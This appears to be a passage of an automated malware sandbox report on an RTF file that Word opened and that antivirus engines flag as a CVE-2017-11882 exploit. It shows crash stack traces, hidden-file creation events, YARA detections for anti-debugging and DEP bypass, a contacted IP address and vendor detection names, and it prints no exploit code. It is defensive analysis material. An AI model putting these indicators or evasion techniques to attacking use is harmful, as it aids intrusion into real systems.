DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4
DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f
DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0
DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab
FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

__exception__

Oct. 6, 2021, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e
DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487
DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347
DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372
DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd
DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5
DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3
wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e
wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27
DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2
DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4
DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f
DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0
DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab
FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2861528
registers.edi: 1957755408
registers.eax: 2861528
registers.ebp: 2861608
registers.edx: 2130566132
registers.ebx: 7629124
registers.esi: 2147944122
registers.ecx: 1208767861

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Oct. 6, 2021, 1:24 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000002d0 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Templates\~$Normal.dotm desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Templates\~$Normal.dotm create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0
NtCreateFile Oct. 6, 2021, 1:24 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000004d8 filepath: C:\Users\test22\AppData\Local\Temp\~$gyty.wbk desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$gyty.wbk create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

198.12.107.117

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

MicroWorld-eScan	Exploit.RTF-ObfsStrm.Gen
FireEye	Exploit.RTF-ObfsStrm.Gen
McAfee	RTFObfustream.e!9F33914979FC
Sangfor	Malware.Generic-RTF.Save.c5a892ae
K7AntiVirus	Trojan ( 0057b3a91 )
K7GW	Trojan ( 0057b3a91 )
Cyren	RTF/CVE-2017-11882.R.gen!Camelot
Symantec	Bloodhound.RTF.20
ESET-NOD32	multiple detections
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Exploit.RTF-ObfsStrm.Gen
NANO-Antivirus	Exploit.Rtf.Heuristic-rtf.dinbqn
Ad-Aware	Exploit.RTF-ObfsStrm.Gen
Emsisoft	Exploit.RTF-ObfsStrm.Gen (B)
DrWeb	Exploit.Rtf.Obfuscated.32
TrendMicro	Trojan.W97M.CVE201711882.SMYNBFR
Ikarus	Exploit.CVE-2017-11882
Avira	HEUR/Rtf.Malformed
Antiy-AVL	Trojan/Generic.ASDOH.22A
Arcabit	Exploit.RTF-ObfsStrm.Gen
GData	Exploit.RTF-ObfsStrm.Gen
Cynet	Malicious (score: 99)
AhnLab-V3	RTF/Malform-A.Gen
TACHYON	Trojan-Exploit/RTF.CVE-2017-11882
Zoner	Probably Heur.RTFBadHeader
MAX	malware (ai score=87)
Fortinet	RTF/CVE_2017_11882.C!exploit

gyty.wbk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All